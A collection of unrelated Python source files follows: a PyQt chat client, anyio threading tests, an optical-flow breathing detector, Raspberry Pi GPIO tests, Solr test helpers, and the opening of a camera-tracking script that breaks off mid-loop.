super(ClientMessage,self).__init__()
self.Message_3 = QtWidgets.QLabel(parent)
self.Message_3.setGeometry(QtCore.QRect(x, y, width, height))
self.Message_3.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color: rgb(255, 152, 152);\n"
"color: rgb(255, 255, 255);")
self.Message_3.setAlignment(QtCore.Qt.AlignCenter)
self.Message_3.setObjectName("Message_3")
self.Message_3.setText(text)
self.FromClient = QtWidgets.QLabel(parent)
self.FromClient.setGeometry(QtCore.QRect(30, 70, 111, 16))
font = QtGui.QFont()
font.setFamily("Microsoft JhengHei UI")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.FromClient.setFont(font)
self.FromClient.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color:transparent;\n"
"color: rgb(0, 0, 0);")
self.FromClient.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.FromClient.setObjectName("FromClient")
self.FromClient.setText(f"From {sender}")
self.Message_3.show()
self.FromClient.show()
if animBool == True:
self.anim(y)
else:
self.Message_3.setGeometry(QtCore.QRect(20,y,151,31))
self.FromClient.setGeometry(QtCore.QRect(20, y-20, 111, 16))
def anim(self,y):
self.animMessage = QtCore.QPropertyAnimation(self.Message_3,b"pos")
self.animMessage.setEndValue(QtCore.QPoint(20,y))
self.animMessage.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage.setDuration(100)
self.animMessage.start()
self.animMessage2 = QtCore.QPropertyAnimation(self.FromClient,b"pos")
self.animMessage2.setEndValue(QtCore.QPoint(20,y-20))
self.animMessage2.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage2.setDuration(100)
self.animMessage2.start()
class SystemMessage(QtWidgets.QLabel):
def __init__(self,animBool,y,text,parent=None,x=690,width=151,height=31):
super(SystemMessage,self).__init__()
self.y = y
self.x = x
self.parent = parent
self.width = width
self.height = height
self.text = text
self.Message_5 = QtWidgets.QLabel(self.parent)
self.Message_5.setGeometry(QtCore.QRect(self.x, self.y, self.width, self.height))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Message_5.setFont(font)
self.Message_5.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color:transparent;\n"
"color: rgb(0, 0, 0);")
self.Message_5.setAlignment(QtCore.Qt.AlignCenter)
self.Message_5.setText(self.text)
self.Message_5.show()
if animBool == True:
self.anim(y)
else:
self.Message_5.setGeometry(190,y,151,31)
def anim(self,y):
self.animMessage = QtCore.QPropertyAnimation(self.Message_5,b"pos")
self.animMessage.setEndValue(QtCore.QPoint(190,y))
self.animMessage.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage.setDuration(100)
self.animMessage.start()
class Client:
def __init__(self,ip,port):
self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.ip,self.port = ip,port
def connect(self):
self.socket.connect((self.ip,self.port))
def sendMessage(self,message):
self.socket.sendall(f"{message}".encode())
def getServerMessage(self):
try:
self.serverMessage = self.socket.recv(1024).decode()
return str(self.serverMessage)
except:
pass
class ChatRoom(QtWidgets.QMainWindow):
messageFromClientSig = QtCore.pyqtSignal(bool,str,str)
messageFromSystemSig = QtCore.pyqtSignal(bool,str)
changeHeightMessageScroll = QtCore.pyqtSignal(int)
messageFromMeSig = QtCore.pyqtSignal(str)
changeNoOnline = QtCore.pyqtSignal(str)
def __init__(self):
super(ChatRoom,self).__init__()
self.myname = ""
self.client = Client(socket.gethostbyname(socket.gethostname()),8080)
uic.loadUi("chat_room.ui",self)
self.mainUi = [self.Title,self.messageScroll,self.messageText,self.sendButton]
self.messageNo = 1
self.loadMessages = []
self.messageScrollHeight = 600
self.regUi = RegisterUi(self)
self.regUi.show()
for i in self.mainUi:
i.setVisible(False)
self.setSize(391,211)
self.pos_y = 20
self.regUi.connectButton.clicked.connect(self.connect)
self.sendButton.clicked.connect(self.sendMessage)
self.messageFromSystemSig.connect(self.messageFromSystem)
self.messageFromClientSig.connect(self.messageFromClient)
self.messageFromMeSig.connect(self.__loadYourMessages__)
self.changeHeightMessageScroll.connect(self.messageFrame.setMinimumHeight)
def setSize(self,width,height):
self.resize(width,height)
self.setFixedSize(width,height)
def connect(self):
name = self.regUi.nameInput.text()
self.myname = name
if name == "":
pass
else:
try:
self.client.connect()
self.__joinMessage__(name)
self.regUi.loginFrame.setVisible(False)
self.setSize(577,648)
threading.Thread(target=self.loopReceiveMessage,daemon=True).start()
for i in self.mainUi:
i.setVisible(True)
except ConnectionRefusedError:
print("Can't Connect.")
def sendMessage(self):
if self.messageText.text() == "":
pass
else:
self.client.sendMessage(f"chat {self.messageText.text()}")
self.messageNo += 1
self.Message = MessageFrame(True,self.pos_y,self.messageText.text(),self.myname,self.messageFrame)
self.Message.setMinimumSize(QtCore.QSize(0, self.messageScrollHeight))
self.messageText.setText("")
def __loadMessages__(self):
for i in self.loadMessages:
if i.split()[0] == "chat":
if i.split()[2] == self.myname:
myMessage = i.split()
text = ""
for a in range(4):
myMessage.pop(0)
for b in myMessage:
text += b+" "
self.messageFromMeSig.emit(text)
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
else:
message = i.split()
text = ""
for a in range(4):
message.pop(0)
for b in message:
text += b+" "
self.messageFromClientSig.emit(False,text,i.split()[2])
if i.split()[0] == "join":
if i.split()[1] == self.myname:
self.messageFromSystemSig.emit(False,"You joined the chat.")
else:
self.messageFromSystemSig.emit(False,f"{i.split()[1]} joined the chat.")
if i.split()[0] == "left":
if i.split()[1] == self.myname:
self.messageFromSystemSig.emit(False,"You left the chat.")
else:
self.messageFromSystemSig.emit(False,f"{i.split()[1]} left the chat.")
def loopReceiveMessage(self):
while True:
try:
data = self.client.getServerMessage()
if data.split()[0] == "chat":
if data.split()[2] == self.myname:
self.pos_y += 60
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
message = data.split()
text = ""
for a in range(4):
message.pop(0)
for b in message:
text += b+" "
else:
message = data.split()
text = ""
for a in range(4):
message.pop(0)
for b in message:
text += b+" "
self.messageFromClientSig.emit(True,text,data.split()[2])
if data.split()[0] == "join":
if data.split()[1] == self.myname:
pass
else:
self.messageFromSystemSig.emit(True,f"{data.split()[1]} joined the chat.")
if data.split()[0] == "left":
if data.split()[1] == self.myname:
pass
else:
self.messageFromSystemSig.emit(True,f"{data.split()[1]} left the chat.")
if data.split()[0] == "loadMessage":
listMessage = data.splitlines()[2].replace("[","").replace("]","").replace("'","")
self.loadMessages = listMessage.split(",")
self.__loadMessages__()
except Exception as e:
pass
def messageFromClient(self,animBool,text,sender):
self.clientMessage = ClientMessage(animBool,self.pos_y,text,sender,self.messageFrame)
self.pos_y += 60
self.messageNo += 1
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
def messageFromSystem(self,animBool,text):
self.SystemMessage = SystemMessage(animBool,self.pos_y,text,self.messageFrame)
self.pos_y += 60
self.messageNo += 1
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
def __loadYourMessages__(self,text):
self.__MyMessage__ = MessageFrame(False,self.pos_y, text, self.myname, self.messageFrame)
self.pos_y += 60
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
def __joinMessage__(self,name):
self.client.sendMessage(f"nickname {name}")
self.messageFromSystemSig.emit(True,"You joined the chat.")
def __leftMessage__(self):
self.client.sendMessage(f"quit")
self.messageFromSystemSig.emit(True,"You left the chat.")
if __name__ == '__main__':
app = QtWidgets.QApplication([])
chatroom = ChatRoom()
def quitting():
try:
chatroom.__leftMessage__()
except:
pass
chatroom.show()
app.aboutToQuit.connect(quitting)
app.exec()
|
test_threads.py
|
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress
import pytest
from anyio import (
create_blocking_portal, create_capacity_limiter, create_event, create_task_group,
run_async_from_thread, run_sync_in_worker_thread, sleep, start_blocking_portal)
pytestmark = pytest.mark.anyio
async def test_run_async_from_thread():
async def add(a, b):
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a, b):
assert threading.get_ident() != event_loop_thread_id
return run_async_from_thread(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await run_sync_in_worker_thread(worker, 1, 2)
assert result == 3
async def test_run_anyio_async_func_from_thread():
def worker(*args):
run_async_from_thread(sleep, *args)
return True
assert await run_sync_in_worker_thread(worker, 0)
async def test_run_in_thread_cancelled():
def thread_worker():
nonlocal state
state = 2
async def worker():
nonlocal state
state = 1
await run_sync_in_worker_thread(thread_worker)
state = 3
state = 0
async with create_task_group() as tg:
await tg.spawn(worker)
await tg.cancel_scope.cancel()
assert state == 1
async def test_run_in_thread_exception():
def thread_worker():
raise ValueError('foo')
with pytest.raises(ValueError) as exc:
await run_sync_in_worker_thread(thread_worker)
exc.match('^foo$')
async def test_run_in_custom_limiter():
def thread_worker():
nonlocal num_active_threads, max_active_threads
num_active_threads += 1
max_active_threads = max(num_active_threads, max_active_threads)
event.wait(1)
num_active_threads -= 1
async def task_worker():
await run_sync_in_worker_thread(thread_worker, limiter=limiter)
event = threading.Event()
num_active_threads = max_active_threads = 0
limiter = create_capacity_limiter(3)
async with create_task_group() as tg:
for _ in range(4):
await tg.spawn(task_worker)
await sleep(0.1)
assert num_active_threads == 3
assert limiter.borrowed_tokens == 3
event.set()
assert num_active_threads == 0
assert max_active_threads == 3
def test_run_async_from_unclaimed_thread():
async def foo():
pass
exc = pytest.raises(RuntimeError, run_async_from_thread, foo)
exc.match('This function can only be run from an AnyIO worker thread')
@pytest.mark.parametrize('cancellable, expected_last_active', [
(False, 'task'),
(True, 'thread')
], ids=['uncancellable', 'cancellable'])
async def test_cancel_worker_thread(cancellable, expected_last_active):
"""
Test that when a task running a worker thread is cancelled, the cancellation is not acted on
until the thread finishes.
"""
def thread_worker():
nonlocal last_active
run_async_from_thread(sleep_event.set)
time.sleep(0.2)
last_active = 'thread'
run_async_from_thread(finish_event.set)
async def task_worker():
nonlocal last_active
try:
await run_sync_in_worker_thread(thread_worker, cancellable=cancellable)
finally:
last_active = 'task'
sleep_event = create_event()
finish_event = create_event()
last_active = None
async with create_task_group() as tg:
await tg.spawn(task_worker)
await sleep_event.wait()
await tg.cancel_scope.cancel()
await finish_event.wait()
assert last_active == expected_last_active
class TestBlockingPortal:
async def test_successful_call(self):
async def async_get_thread_id():
return threading.get_ident()
def external_thread():
thread_ids.append(portal.call(threading.get_ident))
thread_ids.append(portal.call(async_get_thread_id))
thread_ids = []
async with create_blocking_portal() as portal:
thread = threading.Thread(target=external_thread)
thread.start()
await run_sync_in_worker_thread(thread.join)
for thread_id in thread_ids:
assert thread_id == threading.get_ident()
async def test_aexit_with_exception(self):
"""Test that when the portal exits with an exception, all tasks are cancelled."""
def external_thread():
try:
portal.call(sleep, 3)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results = []
with suppress(Exception):
async with create_blocking_portal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
raise Exception
await run_sync_in_worker_thread(thread1.join)
await run_sync_in_worker_thread(thread2.join)
assert len(results) == 2
assert isinstance(results[0], CancelledError)
assert isinstance(results[1], CancelledError)
async def test_aexit_without_exception(self):
"""Test that when the portal exits, it waits for all tasks to finish."""
def external_thread():
try:
portal.call(sleep, 0.2)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results = []
async with create_blocking_portal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
await run_sync_in_worker_thread(thread1.join)
await run_sync_in_worker_thread(thread2.join)
assert results == [None, None]
async def test_call_portal_from_event_loop_thread(self):
async with create_blocking_portal() as portal:
exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
exc.match('This method cannot be called from the event loop thread')
@pytest.mark.parametrize('use_contextmanager', [False, True],
ids=['contextmanager', 'startstop'])
def test_start_with_new_event_loop(self, anyio_backend_name, anyio_backend_options,
use_contextmanager):
async def async_get_thread_id():
return threading.get_ident()
if use_contextmanager:
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
thread_id = portal.call(async_get_thread_id)
else:
portal = start_blocking_portal(anyio_backend_name, anyio_backend_options)
try:
thread_id = portal.call(async_get_thread_id)
finally:
portal.call(portal.stop)
assert isinstance(thread_id, int)
assert thread_id != threading.get_ident()
def test_call_stopped_portal(self, anyio_backend_name, anyio_backend_options):
portal = start_blocking_portal(anyio_backend_name, anyio_backend_options)
portal.call(portal.stop)
pytest.raises(RuntimeError, portal.call, threading.get_ident).\
match('This portal is not running')
|
OF_circle.py
|
import cv2
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import math
import threading
def main():
cap = cv2.VideoCapture(vid_path)
status1, previous_frame = cap.read()
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
copy_frame = cv2.cvtColor(previous_frame, cv2.COLOR_BGR2GRAY)
hsv = np.zeros_like(previous_frame)
hsv[...,1] = 255
t = 20
dc = 6
red = 30
check_red = 1
start = 0
radiuce_up_limit =60
radiuce_low_limit = 30
i = 0
while(i < total_frames - 1):
ret, frame = cap.read()
i = i + 1
frame1 = frame.copy()
current_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
current_frame = cv2.GaussianBlur(current_frame, (var_blur,var_blur), 0)
# optical Flow
flow = cv2.calcOpticalFlowFarneback(copy_frame,current_frame, None, 0.5, 3, 15, 3, 5, 1.2, 0)
mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])
hsv[...,0] = ang*180/np.pi/2
hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)
bgr = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)
grayscaled = cv2.cvtColor(bgr,cv2.COLOR_BGR2GRAY)
retval2 , binary_image2 = cv2.threshold(grayscaled,125,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
lab_val = 255
n_labels, img_labeled, lab_stats, _ = \
cv2.connectedComponentsWithStats(binary_image2, connectivity=8,
ltype=cv2.CV_32S)
if check_red == 1:
red = red +10
if red > radiuce_up_limit:
check_red =0
else:
red = red -10
if red == radiuce_low_limit:
check_red =1
if lab_stats[1:, 4].size > 2:
start = 1
dc = dc +1
if dc > 6:
dc = 0
re = lab_stats[1:, 4].argsort()[-3:][::-1] + 1
largest_mask = np.zeros(binary_image2.shape, dtype=np.uint8)
largest_mask[img_labeled == re[0]] = lab_val
cnts1 = cv2.findContours(largest_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts1 = cnts1[0] if imutils.is_cv2() else cnts1[1]
X1 = cnts1[0][0]
cX1 = X1[0][0]
cY1 = X1[0][1]
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
t = t+1
if t > 40:
if lab_stats[1:, 4].size > 0 and start == 1:
t = 0
cv2.putText(frame,'Not Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
else:
cv2.circle(frame, (cX1, cY1), red, (0, 255, 255), 3)
cv2.putText(frame,'Breathing',(10,40),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,255),1,cv2.LINE_AA)
cv2.imshow('Frame',frame)
previous_frame = current_frame
k = cv2.waitKey(1) & 0xff
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
Tk().withdraw()
vid_path = askopenfilename(filetypes =(("Video File", "*.mp4"),("Video File","*.avi"),("Video File", "*.flv"),("All Files","*.*")),
title = "Choose a video.")
no_of_threads = 1
var_blur = 3
thred = []
jobs = []
for i in range(0, no_of_threads):
thred = threading.Thread(target=main)
jobs.append(thred)
for j in jobs:
j.start()
for j in jobs:
j.join()
|
tests_gpio.py
|
#!/usr/bin/env python
#
# This file is part of RPIO.
#
# Copyright
#
# Copyright (C) 2013 Chris Hager <chris@linuxuser.at>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://pythonhosted.org/RPIO
#
"""
This test suite runs on the Raspberry Pi and tests RPIO inside out.
"""
import os
import sys
import time
import unittest
import socket
from threading import Thread
import logging
log_format = '%(levelname)s | %(asctime)-15s | %(message)s'
logging.basicConfig(format=log_format, level=logging.DEBUG)
import RPIO
RPIO.setwarnings(False)
GPIO_IN = 14
GPIO_OUT = 17
def run(cmd):
logging.info("Running `%s`...", cmd)
os.system(cmd)
class TestSequenceFunctions(unittest.TestCase):
def test1_version(self):
logging.info("Version: %s (%s)", RPIO.VERSION, RPIO.VERSION_GPIO)
def test2_rpio_cmd(self):
logging.info(" ")
cmd = "sudo python rpio" if sys.version_info[0] == 2 else \
"sudo python3 rpio"
logging.info("=== rpio COMMAND LINE TOOL TESTS (`%s`)===", cmd)
run("%s --version" % cmd)
run("%s -v -I" % cmd)
run("%s -v -i 5,%s,%s" % (cmd, GPIO_IN, GPIO_OUT))
# run("sudo python rpio --update-man")
run("%s --sysinfo" % cmd)
def test3_input(self):
logging.info(" ")
logging.info(" ")
logging.info("=== INPUT TESTS ===")
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
RPIO.setup(5, RPIO.IN)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
RPIO.setup(0, RPIO.IN)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
RPIO.setup(32, RPIO.IN)
RPIO.setup(GPIO_IN, RPIO.IN)
logging.info(" ")
logging.info("--------------------------------------")
logging.info("Input from GPIO-%s w/ PULLOFF: %s", \
GPIO_IN, RPIO.input(GPIO_IN))
RPIO.set_pullupdn(GPIO_IN, RPIO.PUD_UP)
logging.info("Input from GPIO-%s w/ PULLUP: %s", \
GPIO_IN, RPIO.input(GPIO_IN))
RPIO.set_pullupdn(GPIO_IN, RPIO.PUD_DOWN)
logging.info("Input from GPIO-%s w/ PULLDOWN: %s", \
GPIO_IN, RPIO.input(GPIO_IN))
logging.info("--------------------------------------")
logging.info(" ")
RPIO.set_pullupdn(GPIO_IN, RPIO.PUD_OFF)
def test4_output(self):
logging.info(" ")
logging.info(" ")
logging.info("=== OUTPUT TESTS ===")
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
# 5 is not a valid gpio
RPIO.setup(5, RPIO.OUT)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
# 5 is not a valid gpio
RPIO.setup(0, RPIO.OUT)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
# 5 is not a valid gpio
RPIO.setup(32, RPIO.OUT)
logging.info("Setting up GPIO-%s as output...", GPIO_OUT)
RPIO.setup(GPIO_OUT, RPIO.OUT, initial=RPIO.LOW)
RPIO.setup(GPIO_OUT, RPIO.OUT)
logging.info("Setting GPIO-%s output to 1...", GPIO_OUT)
RPIO.output(GPIO_OUT, RPIO.HIGH)
time.sleep(2)
logging.info("Setting GPIO-%s output to 0...", GPIO_OUT)
RPIO.output(GPIO_OUT, RPIO.LOW)
def test5_board_pin_numbers(self):
logging.info(" ")
logging.info(" ")
logging.info("=== BCM AND BOARD NUMBERING TESTS ===")
RPIO.setmode(RPIO.BCM)
if RPIO.sysinfo()[1] == 'B+':
pins = RPIO.GPIO_LIST_R3
elif RPIO.RPI_REVISION == 1:
pins = RPIO.GPIO_LIST_R1
else:
pins = RPIO.GPIO_LIST_R2
logging.info("testing bcm gpio numbering: %s", pins)
for pin in pins:
gpio_id = RPIO.channel_to_gpio(pin)
logging.info("- BCM channel %s = gpio %s", pin, gpio_id)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
gpio_id = RPIO.channel_to_gpio(32)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
gpio_id = RPIO.channel_to_gpio(5)
logging.info(" ")
pins = RPIO.PIN_LIST
RPIO.setmode(RPIO.BOARD)
logging.info("testing board gpio numbering: %s", pins)
for pin in pins:
if pin >> 8 > 0:
# py_gpio.c cannot deal with BOARD->BCM of P5 pins yet
continue
gpio_id = RPIO.channel_to_gpio(pin)
logging.info("- BOARD channel %s = gpio %s", pin, gpio_id)
with self.assertRaises(RPIO._GPIO.InvalidChannelException):
gpio_id = RPIO.channel_to_gpio(0)
RPIO.setmode(RPIO.BCM)
def test6_interrupts(self):
logging.info(" ")
logging.info(" ")
logging.info("=== INTERRUPT TESTS ==")
def test_callback(*args):
logging.info("- interrupt callback received: %s", (args))
def stop_interrupts(timeout=3):
time.sleep(timeout)
RPIO.stop_waiting_for_interrupts()
logging.info("- called `stop_waiting_for_interrupts()`")
PORT = 8080
def socket_callback(socket, msg):
logging.info("Socket [%s] msg received: %s", socket.fileno(), msg)
def socket_client(timeout=3):
logging.info("Socket client connecting in 3 seconds...")
time.sleep(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", PORT))
s.sendall("Hello, world".encode('utf-8'))
s.close()
logging.info("Socket client done...")
#
# Interrupt test with socket comm
#
logging.info(" ")
logging.info("Testing interrupts on GPIO-%s and socket comm", GPIO_IN)
RPIO.add_tcp_callback(PORT, socket_callback)
with self.assertRaises(AttributeError):
RPIO.add_tcp_callback(8081, None)
RPIO.add_interrupt_callback(GPIO_IN, test_callback, edge='both', \
pull_up_down=RPIO.PUD_DOWN)
RPIO.add_interrupt_callback(GPIO_IN, test_callback, edge='both', \
pull_up_down=RPIO.PUD_DOWN, threaded_callback=True)
# Add a number of TCP clients
Thread(target=socket_client).start()
Thread(target=socket_client, args=(4,)).start()
Thread(target=socket_client, args=(4,)).start()
Thread(target=socket_client, args=(4,)).start()
Thread(target=socket_client, args=(4,)).start()
# One stop interrupts thread
Thread(target=stop_interrupts, args=(10,)).start()
logging.info("- waiting 10s for interrupts on GPIO-%s...", GPIO_IN)
RPIO.wait_for_interrupts()
logging.info("-")
RPIO.cleanup()
#
# Auto interrupt shutdown with thread and stop_waiting_for_interrupts
#
logging.info("start second ")
RPIO.add_interrupt_callback(GPIO_IN, test_callback, edge='both', \
pull_up_down=RPIO.PUD_OFF)
RPIO.add_interrupt_callback(GPIO_OUT, test_callback, edge='falling', \
pull_up_down=RPIO.PUD_UP, debounce_timeout_ms=100)
logging.info("- waiting 3s for interrupts on gpio %s and %s...", \
GPIO_IN, GPIO_OUT)
Thread(target=stop_interrupts, args=(3,)).start()
RPIO.wait_for_interrupts()
logging.info("-")
RPIO.cleanup()
logging.info("ALL DONE :)")
if __name__ == '__main__':
logging.info("==================================")
logging.info("= Test Suite Run with Python %s =" % \
sys.version_info[0])
logging.info("==================================")
logging.info("")
logging.info("")
unittest.main()
|
utils.py
|
from os.path import dirname, join
from httplib import HTTPConnection
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from StringIO import StringIO
from socket import error
from sys import stderr
from re import search
from collective.solr.local import getLocal, setLocal
from collective.solr import tests
try:
from zope.component.hooks import getSite, setSite
except ImportError:
from zope.app.component.hooks import getSite, setSite
try:
from Zope2.App import zcml
except ImportError:
from Products.Five import zcml
def loadZCMLString(string):
# Unset current site for Zope 2.13
saved = getSite()
setSite(None)
try:
zcml.load_string(string)
finally:
setSite(saved)
def getData(filename):
""" return a file object from the test data folder """
filename = join(dirname(tests.__file__), 'data', filename)
return open(filename, 'r').read()
def fakehttp(solrconn, *fakedata):
""" helper function to set up a fake http request on a SolrConnection """
class FakeOutput(list):
""" helper class to organize output from fake connections """
conn = solrconn
def log(self, item):
self.current.append(item)
def get(self, skip=0):
self[:] = self[skip:]
return ''.join(self.pop(0)).replace('\r', '')
def new(self):
self.current = []
self.append(self.current)
def __len__(self):
self.conn.flush() # send out all pending xml
return super(FakeOutput, self).__len__()
def __str__(self):
self.conn.flush() # send out all pending xml
if self:
return ''.join(self[0]).replace('\r', '')
else:
return ''
output = FakeOutput()
class FakeSocket(StringIO):
""" helper class to fake socket communication """
def sendall(self, str):
output.log(str)
def makefile(self, mode, name):
return self
def read(self, amt=None):
if self.closed:
return ''
return StringIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return ''
return StringIO.readline(self, length)
class FakeHTTPConnection(HTTPConnection):
""" helper class to fake a http connection object from httplib.py """
def __init__(self, host, *fakedata):
HTTPConnection.__init__(self, host)
self.fakedata = list(fakedata)
def putrequest(self, *args, **kw):
response = self.fakedata.pop(0) # get first response
self.sock = FakeSocket(response) # and set up a fake socket
output.new() # as well as an output buffer
HTTPConnection.putrequest(self, *args, **kw)
def setTimeout(self, timeout):
pass
solrconn.conn = FakeHTTPConnection(solrconn.conn.host, *fakedata)
return output
def fakemore(solrconn, *fakedata):
""" helper function to add more fake http requests to a SolrConnection """
assert hasattr(solrconn.conn, 'fakedata') # `isinstance()` doesn't work?
solrconn.conn.fakedata.extend(fakedata)
def fakeServer(actions, port=55555):
""" helper to set up and activate a fake http server used for testing
purposes; <actions> must be a list of handler functions, which will
receive the base handler as their only argument and are used to
process the incoming requests in turn; returns a thread that should
be 'joined' when done """
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def do_GET(self):
action = actions.pop(0) # get next action
action(self) # and process it...
def log_request(*args, **kw):
pass
def runner():
while actions:
server.handle_request()
server = HTTPServer(('', port), Handler)
thread = Thread(target=runner)
thread.start()
return thread
def pingSolr():
""" test if the solr server is available """
status = getLocal('solrStatus')
if status is not None:
return status
conn = HTTPConnection('localhost', 8983)
try:
conn.request('GET', '/solr/admin/ping')
response = conn.getresponse()
status = response.status == 200
msg = "INFO: solr return status '%s'" % response.status
except error, e:
status = False
msg = 'WARNING: solr tests could not be run: "%s".' % e
if not status:
print >> stderr
print >> stderr, '*' * len(msg)
print >> stderr, msg
print >> stderr, '*' * len(msg)
print >> stderr
setLocal('solrStatus', status)
return status
def numFound(result):
match = search(r'numFound="(\d+)"', result)
if match is not None:
match = int(match.group(1))
return match
|
Shooter_CameraTracker.py
|
import sys
import os
import time
import numpy as np
import serial ### pip install serial, pip install pyserial
import struct
import logging
# import dlib
import copy
from imutils.video import VideoStream
from imutils.video import FPS
import argparse
import imutils
import time
# Threads
# from thread import start_new_thread
from threading import Lock
import threading
# from matplotlib import pyplot as plt
# from ovrsdk import * ### pip install python-ovrsdk
# from Quaternion import Quat
import binascii
import cv2 #### DONOT: pip install opencv-python DO: sudo apt-get install python-opencv
# import face_recognition # https://github.com/ageitgey/face_recognition
NUMOFSCREENS = 2
MAX_FACES = 10
serialExist = True
wanted_dir = "./examples/wanted/"
boring_dir = "./examples/boring/"
camera_L = 1
camera_R = 0
ArduinoCOM = '/dev/ttyACM0'
factor_LR = 0.6
factor_UD = 0.1
factor_line = 0.2
DRAW_RIGHT_EYE = True
cy_sub = 540
cx_sub = 960
dx_sub = 150
dy_sub = 100
tmp_dy_sub = 80
tmp_dx_sub = 0
left_camera_image = -1
right_camera_image = -1
face_locations_global = []
face_names_global = []
face_interest_global = []
face_landmarks_list_global = []
wanted_list_global = []
tracking_frame_global = []
wanted_sz = 100
grab_data = True
track_data = False
dx = 0
dy = 0
frame_lock = Lock()
cap = cv2.VideoCapture(0)
key = 0
dec = 0
ra = 0
killFlag = False
lock = threading.Lock()
fov_h = 61 # DEG
fov_v = 34.4
error_in_deg_v = 0
error_in_deg_h = 0
mouseX = mouseY = 0
update_tracker = False
lk_params = dict(winSize = (15, 15),
maxLevel = 4,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
minimun_pts_track = 10
tarcking_window_height = 10
tracking_window_width = 10
bias_h = 0
bias_v = 0
p_bias_h = 0
p_bias_v = 0
e_h = 0
e_v = 0
p_e_h = 0
p_e_v = 0
track_center = np.zeros(2)
def draw_circle(event, x, y, flags, param):
global gray
global mouseX, mouseY
global error_in_deg_v, error_in_deg_h
global update_tracker
global start_tracking,track_x,track_y, bias_h,bias_v , width , height , p_bias_h ,p_bias_v,track_center,e_h,e_v , p_e_h , p_e_v
if event == cv2.EVENT_LBUTTONDBLCLK:
update_tracker = True
mouseX, mouseY = x, y
start_tracking = True
track_x = x
track_y = y
p_bias_h = bias_h
p_bias_v = bias_v
p_e_h = e_h
p_e_v = e_v
bias_h += width / 2 - x
bias_v += height / 2 - y
if track_center[0]:
e_h = width / 2 - track_center[0]
e_v = height / 2 - track_center[1]
print(p_e_h,p_e_v,p_bias_h,p_bias_v,bias_h,bias_v,x, y)
def camera_thread_better():
global key, ra, dec, killFlag, error_in_deg_h, error_in_deg_v
global gray
global mouseX, mouseY
global update_tracker
global start_tracking,track_x,track_y , bias_h,bias_v , width , height, p_bias_h ,p_bias_v,track_center , p_e_h , p_e_v
start_tracking = False
is_tracking = False
track_x, track_y = (0, 0)
tracking_corners = None
lk_params = dict(winSize=(15, 15),
maxLevel=4,
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
minimun_pts_track = 10
cam = cv2.VideoCapture(0)
cv2.namedWindow('viewer', cv2.WINDOW_NORMAL)
cv2.setMouseCallback("viewer", draw_circle)
old_gray = None
while True:
ret, frame = cam.read()
if ret:
